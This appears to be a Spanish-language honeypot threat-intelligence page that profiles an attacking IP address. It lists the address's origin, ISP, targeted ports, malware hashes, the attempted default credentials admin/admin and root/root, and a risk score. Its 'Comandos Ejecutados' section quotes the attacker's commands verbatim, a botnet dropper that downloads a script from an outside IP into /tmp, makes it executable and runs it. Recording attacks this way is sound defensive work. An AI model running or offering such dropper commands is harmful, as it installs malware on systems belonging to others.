TROYANOSYVIRUS
Amenaza ActivaCRITICO

64.89.161.198

Pais de Origen🇸🇬 Singapur
Primera Deteccion2/2/2026
Ultima Actividad20/2/2026
ISPOVH SAS
🎯
149
Ataques Totales
🔌
24
Puertos
📡
7
Tipos Ataque
🦠
4
Malware

Geolocalizacion

Pais
🇸🇬 Singapur
Ciudad
Desconocida
ASN
AS16276
ISP
OVH SAS

Tipos de Ataque

h0neytr4p
cowrie
honeyaml
dionaea
tanner
honeytrap
ciscoasa

Puertos Atacados

2380814431443300030013002300330043005300630103128330140004005406344448081+4

Malware Asociado

c1c4ba9b177635033c28...db28e0588b7197dd095d...e3b0c44298fc1c149afb...e901d9ee2be164b109aa...

Credenciales Intentadas

🔐admin/admin
10x
🔐root/root
6x

Comandos Ejecutados

$echo MAGIC_PAYLOAD_KILLER_HERE_OR_LEAVE_EMPTY_iranbot_was_here cd /tmp; rm -f cat.sh; rm -rf iran.*; wget http://188.214.30.5/r.sh -O r.sh; chmod 777 r.sh; ./r.sh2x
$echo SUCCESS2x
$echo MAGIC_PAYLOAD_KILLER_HERE_OR_LEAVE_EMPTY_iranbot_was_here cd /tmp; rm -f cat.sh; rm -rf iran.*; wget http://188.214.30.5/r.sh -O r.sh; chmod 777 r.sh; ./r.sh telnet1x

Evaluacion de Riesgo

95
/100
BajoMedioAltoCritico